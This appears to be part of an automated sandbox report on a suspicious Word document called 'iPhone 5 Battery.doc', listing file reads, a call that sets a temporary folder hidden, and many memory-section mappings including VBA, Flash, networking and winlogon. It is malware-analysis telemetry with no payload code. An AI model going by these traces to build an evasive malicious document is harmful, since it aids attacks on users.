C:\Documents and Settings\Administrator\Desktop\iPhone 5 Battery.doc unknown 90112 C9 DF 16 87 9B 99 9A 9B 98 9D 9E 9F 6F 6E 92 93 2C 95 96 97 E8 E9 EA EB AC ED EE EF E0 E1 E2 E3 E4 E5 E6 E7 F8 F9 FA FB FC FD FE FF F0 F1 F2 F3 F4 F5 F6 F7 C8 C9 CA CB CC CD CE CF 38 C1 C2 C3 CA DA 7C C9 D8 6D D3 16 FD 65 DF 93 1D F0 86 BB BD A6 F6 A7 5A 46 4D 59 4D 40 0E 4C 41 4F 4C 4C 50 05 44 42 success or wait 1 C0D044D ReadFile
C:\Documents and Settings\Administrator\Desktop\iPhone 5 Battery.doc unknown 21504 32 2C F5 05 47 56 E2 18 FA FB FC FD FE FF F0 F1 F2 F3 F4 F5 F6 F7 C8 C9 F4 CB CF CD 30 30 C9 C1 C4 C3 C4 C5 C6 C7 D8 D9 DA DB DC DD DF DF D0 D1 F7 D3 D4 D5 D6 D7 28 29 2A 3B 2C 2D 09 2F 20 21 23 23 24 25 D8 D8 C7 C6 3A 3B 3C 3D 1A 3F 30 31 CD CC CB CA C9 C8 F7 F6 F5 F4 F3 F2 F1 F0 FF FE FD FC FB FA success or wait 1 C0D02FB ReadFile
File Path Disposition Data Ascii Data Completion Count Source Address Symbol
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.Word BasicInformation Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: hidden and archive and temporary and sparse file success or wait 1 3017FDD4 SetFileAttributesW

Section Activities

File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 260000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 280000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 2D0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 320000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 410000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 410000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 850000 12288 own pid readonly success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\1033\WWINTL.DLL write and read and execute commit 8C0000 778240 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\1033\WWINTL.DLL query and read commit 8C0000 778240 own pid readonly success or wait 1
\BaseNamedObjects\Local\Mso97SharedDg19211108172 query and write and read and execute and extend size unknown unknown unknown unknown unknown object name not found 1
\BaseNamedObjects\Local\Mso97SharedDg19211108172 query and write and read reserve A10000 126976 own pid read write success or wait 1
\KnownDlls\uxtheme.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\uxtheme.dll query and write and read and execute image 5AD70000 229376 own pid read write success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit A50000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll query and write and read and execute image 74720000 311296 own pid read write success or wait 1
\BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read commit unknown unknown unknown unknown object name exists 1
\BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown A50000 262144 own pid read write success or wait 1
C:\WINDOWS\system32\msctfime.ime write and read and execute commit A90000 180224 own pid execute success or wait 1
C:\WINDOWS\system32\msctfime.ime query and read commit A90000 180224 own pid readonly success or wait 1
C:\WINDOWS\system32\msctfime.ime write and read and execute commit A90000 180224 own pid execute success or wait 1
C:\WINDOWS\system32\msctfime.ime query and read commit A90000 180224 own pid readonly success or wait 1
C:\WINDOWS\system32\msctfime.ime write and read and execute commit A90000 180224 own pid execute success or wait 1
C:\WINDOWS\system32\msctfime.ime query and write and read and execute image 755C0000 188416 own pid read write success or wait 1
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\1033\MSOINTL.DLL write and read and execute commit AA0000 1757184 own pid execute success or wait 1
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\1033\MSOINTL.DLL query and read commit AA0000 1757184 own pid readonly success or wait 1
\BaseNamedObjects\Local\Mso97SharedDg20321108172 query and write and read and execute and extend size unknown unknown unknown unknown unknown object name not found 1
\BaseNamedObjects\Local\Mso97SharedDg20321108172 query and write and read reserve C50000 126976 own pid read write success or wait 1
C:\WINDOWS\system32\rpcss.dll write and read and execute commit CF0000 401408 own pid execute success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
C:\WINDOWS\system32\shell32.dll read commit CF0000 8462336 own pid readonly success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit CF0000 618496 own pid readonly success or wait 1
\BaseNamedObjects\DfSharedHeap35EFC query and write and read reserve DA0000 4194304 own pid read write success or wait 1
\BaseNamedObjects\DFMap0-220928 query and write and read commit D10000 524288 own pid read write success or wait 1
\BaseNamedObjects\DfRoot000035EFC query and write and read commit 11A0000 4096 own pid read write success or wait 1
\BaseNamedObjects\DFMap0-220944 query and write and read commit 11B0000 524288 own pid read write success or wait 1
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\RICHED20.DLL write and read and execute commit 1240000 1105920 own pid execute success or wait 1
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\RICHED20.DLL query and write and read and execute image 39700000 1097728 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
C:\WINDOWS\system32\msimtf.dll write and read and execute commit 1300000 159744 own pid execute success or wait 1
C:\WINDOWS\system32\msimtf.dll write and read and execute commit 1300000 159744 own pid execute success or wait 1
C:\WINDOWS\system32\msimtf.dll write and read and execute commit 1300000 159744 own pid execute success or wait 1
C:\WINDOWS\system32\msimtf.dll write and read and execute commit 1300000 159744 own pid execute success or wait 1
\BaseNamedObjects\CTF.AsmListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown 1300000 4096 own pid read write success or wait 1
\KnownDlls\CLBCATQ.DLL write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\clbcatq.dll query and write and read and execute image 76FD0000 520192 own pid read write success or wait 1
\KnownDlls\COMRes.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\comres.dll query and write and read and execute image 77050000 806912 own pid read write success or wait 1
C:\WINDOWS\system32\winlogon.exe write and read and execute commit 1330000 507904 own pid execute success or wait 1
\KnownDlls\xpsp2res.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\xpsp2res.dll query and write and read and execute image 1330000 2904064 own pid read write conflicting addresses 1
C:\WINDOWS\system32\sti.dll write and read and execute commit 1900000 69632 own pid execute success or wait 1
C:\WINDOWS\system32\sti.dll query and write and read and execute image 73BA0000 77824 own pid read write success or wait 1
\KnownDlls\CFGMGR32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\cfgmgr32.dll query and write and read and execute image 74AE0000 28672 own pid read write success or wait 1
\KnownDlls\setupapi.DLL write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.IOG..LMIJC query and write and read commit 1900000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.Shared.SFM.MNH query and write and read and execute and extend size unknown 1910000 524288 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.IOG.B.LNIJC query and write and read commit 1900000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.IOG.C.LNIJC query and write and read commit 1990000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.IOG.D.LNIJC query and write and read commit 19A0000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.IOG.E.LNIJC query and write and read commit 1900000 4096 own pid read write success or wait 1
\BaseNamedObjects\Local\Mso97SharedDg19521108172 query and write and read and execute and extend size unknown unknown unknown unknown unknown object name not found 1
\BaseNamedObjects\Local\Mso97SharedDg19521108172 query and write and read reserve 19B0000 126976 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.IOG.F.KOIJC query and write and read commit 1900000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.IOG.G.KOIJC query and write and read commit 1900000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MNH.CB.KPIJC query and write and read and execute and extend size unknown 1900000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MNH.DB.KPIJC query and write and read and execute and extend size unknown 1900000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MNH.EB.KPIJC query and write and read and execute and extend size unknown 1900000 4096 own pid read write success or wait 1
\BaseNamedObjects\Local\Mso97SharedDg19521108172 query and write and read and execute and extend size unknown 1990000 126976 own pid read write success or wait 1
\BaseNamedObjects\Local\Mso97SharedDg19531108172 query and write and read and execute and extend size unknown unknown unknown unknown unknown object name not found 1
\BaseNamedObjects\Local\Mso97SharedDg19531108172 query and write and read reserve 1990000 126976 own pid read write success or wait 1
\BaseNamedObjects\DfSharedHeap37B58 query and write and read reserve 19D0000 4194304 own pid read write success or wait 1
\BaseNamedObjects\DFMap0-228188 query and write and read commit 1DD0000 598016 own pid read write success or wait 1
\BaseNamedObjects\DfRoot000037B58 query and write and read commit 1E70000 4096 own pid read write success or wait 1
\BaseNamedObjects\DFMap0-228204 query and write and read commit 1E80000 524288 own pid read write success or wait 1
\KnownDlls\winspool.drv write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\winspool.drv query and write and read and execute image 73000000 155648 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\unidrvui.dll write and read and execute commit 2020000 745472 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\unidrvui.dll query and write and read and execute image 7E5A0000 761856 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2020000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2030000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2030000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\unires.dll write and read and execute commit 2040000 761856 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\unires.dll query and write and read and execute image 2040000 765952 own pid read write conflicting addresses 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdrv.dll write and read and execute commit 2020000 765952 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdrv.dll query and write and read and execute image 3F500000 786432 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2030000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2040000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2040000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2430000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2440000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2440000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\fontsub.dll write and read and execute commit 2430000 81920 own pid execute success or wait 1
C:\WINDOWS\system32\fontsub.dll query and write and read and execute image 69310000 94208 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\unires.dll write and read and execute commit 1F20000 761856 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\unires.dll query and write and read and execute image 1F20000 765952 own pid read write conflicting addresses 1
C:\WINDOWS\system32\fontsub.dll write and read and execute commit 1F00000 81920 own pid execute success or wait 1
C:\WINDOWS\system32\fontsub.dll query and write and read and execute image 69310000 94208 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\prntvpt.dll write and read and execute commit 1F00000 118784 own pid execute success or wait 1
C:\WINDOWS\system32\prntvpt.dll query and write and read and execute image 3FB50000 131072 own pid read write success or wait 1
\BaseNamedObjects\AtlDebugAllocator_FileMappingNameStatic3_488 query and write and read reserve 2430000 4194304 own pid read write success or wait 1
\KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
\BaseNamedObjects\Local\MSO_Formal11108172_S-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown unknown unknown unknown unknown object name not found 1
\BaseNamedObjects\Local\MSO_Formal11108172_S-1-5-21-507921405-1960408961-839522115-500 query and write and read commit 1F10000 8192 own pid read write success or wait 1
\BaseNamedObjects\Local\MSO_AdHoc11108172_S-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown unknown unknown unknown unknown object name not found 1
\BaseNamedObjects\Local\MSO_AdHoc11108172_S-1-5-21-507921405-1960408961-839522115-500 query and write and read commit 1F20000 8192 own pid read write success or wait 1
C:\WINDOWS\system32\msimtf.dll write and read and execute commit 1F70000 159744 own pid execute success or wait 1
\BaseNamedObjects\Global\RotHintTable read unknown 1F70000 4096 own pid readonly success or wait 1
\KnownDlls\msi.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msi.dll query and write and read and execute image 7D1E0000 2867200 own pid read write success or wait 1
C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL write and read and execute commit 2830000 2588672 own pid execute success or wait 1
C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL query and read commit 2830000 2588672 own pid readonly success or wait 1
C:\Program Files\Common Files\Microsoft Shared\VBA\VBA6\VBE6.DLL write and read and execute commit 2830000 2588672 own pid execute success or wait 1
C:\Program Files\Common Files\Microsoft Shared\VBA\VBA6\VBE6.DLL query and read commit 2830000 2588672 own pid readonly success or wait 1
\KnownDlls\SXS.DLL write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\sxs.dll query and write and read and execute image 7E720000 720896 own pid read write success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\MSWORD.OLB query and read commit 2830000 659456 own pid readonly success or wait 1
C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\1033\VBE6INTL.DLL write and read and execute commit 1FA0000 163840 own pid execute success or wait 1
C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\1033\VBE6INTL.DLL query and write and read and execute image 65300000 155648 own pid read write success or wait 1
\BaseNamedObjects\DfSharedHeap38B25 query and write and read reserve 2A30000 4194304 own pid read write success or wait 1
\BaseNamedObjects\DFMap0-232234 query and write and read commit 2E30000 524288 own pid read write success or wait 1
\BaseNamedObjects\DfRoot000038B25 query and write and read commit 1FE0000 4096 own pid read write success or wait 1
C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL query and read commit 2F40000 53248 own pid readonly success or wait 1
C:\WINDOWS\system32\stdole2.tlb query and read commit 2F50000 16384 own pid readonly success or wait 1
C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL query and read commit 2F60000 57344 own pid readonly success or wait 1
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL query and read commit 2FB0000 266240 own pid readonly success or wait 1
C:\WINDOWS\system32\Macromed\Flash\Flash11f.ocx query and read commit 3000000 40960 own pid readonly success or wait 1
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Word8.0\ShockwaveFlashObjects.exd query and read commit 3010000 20480 own pid readonly success or wait 1
C:\WINDOWS\system32\Macromed\Flash\Flash11f.ocx write and read and execute commit 3020000 8634368 own pid execute success or wait 1
C:\WINDOWS\system32\Macromed\Flash\Flash11f.ocx query and write and read and execute image 10000000 9596928 own pid read write success or wait 1
\KnownDlls\WINMM.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
\KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1
\KnownDlls\Normaliz.dll write and read and execute unknown 3030000 36864 own pid read write conflicting addresses 1
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1
\KnownDlls\CRYPT32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\crypt32.dll query and write and read and execute image 77A80000 610304 own pid read write success or wait 1
\KnownDlls\MSASN1.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msasn1.dll query and write and read and execute image 77B20000 73728 own pid read write success or wait 1
\KnownDlls\DSOUND.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\dsound.dll query and write and read and execute image 73F10000 376832 own pid read write success or wait 1
\KnownDlls\COMDLG32.dll write and read and execute unknown 763B0000 299008 own pid read write success or wait 1
\KnownDlls\WS2_32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1
\KnownDlls\WS2HELP.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1
\KnownDlls\d3d9.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\d3d9.dll query and write and read and execute image 4FDD0000 1728512 own pid read write success or wait 1
\KnownDlls\d3d8thk.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\d3d8thk.dll query and write and read and execute image 6D990000 24576 own pid read write success or wait 1
\KnownDlls\mscms.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\mscms.dll query and write and read and execute image 73B30000 86016 own pid read write success or wait 1
\KnownDlls\ieframe.dll write and read and execute unknown 3E1C0000 11096064 own pid read write success or wait 1
C:\WINDOWS\system32\en-us\ieframe.dll.mui query and read commit 35B0000 1241088 own pid write copy success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 36E0000 12312576 own pid execute success or wait 1
\KnownDlls\msapsspc.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msapsspc.dll query and write and read and execute image 71E50000 86016 own pid read write success or wait 1
\KnownDlls\MSVCRT40.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msvcrt40.dll query and write and read and execute image 78080000 69632 own pid read write success or wait 1
\KnownDlls\schannel.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\schannel.dll query and write and read and execute image 767F0000 163840 own pid read write success or wait 1
\KnownDlls\NETAPI32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\netapi32.dll query and write and read and execute image 5B860000 348160 own pid read write success or wait 1
\KnownDlls\digest.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\digest.dll query and write and read and execute image 75B00000 86016 own pid read write success or wait 1
\KnownDlls\msnsspc.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msnsspc.dll query and write and read and execute image 747B0000 290816 own pid read write success or wait 1
\KnownDlls\MSVCRT40.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msvcrt40.dll query and write and read and execute image 78080000 69632 own pid read write success or wait 1
C:\WINDOWS\system32\schannel.dll write and read and execute commit 36E0000 151552 own pid execute success or wait 1
C:\WINDOWS\system32\schannel.dll query and write and read and execute image 767F0000 163840 own pid read write success or wait 1
\KnownDlls\NETAPI32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\netapi32.dll query and write and read and execute image 5B860000 348160 own pid read write success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
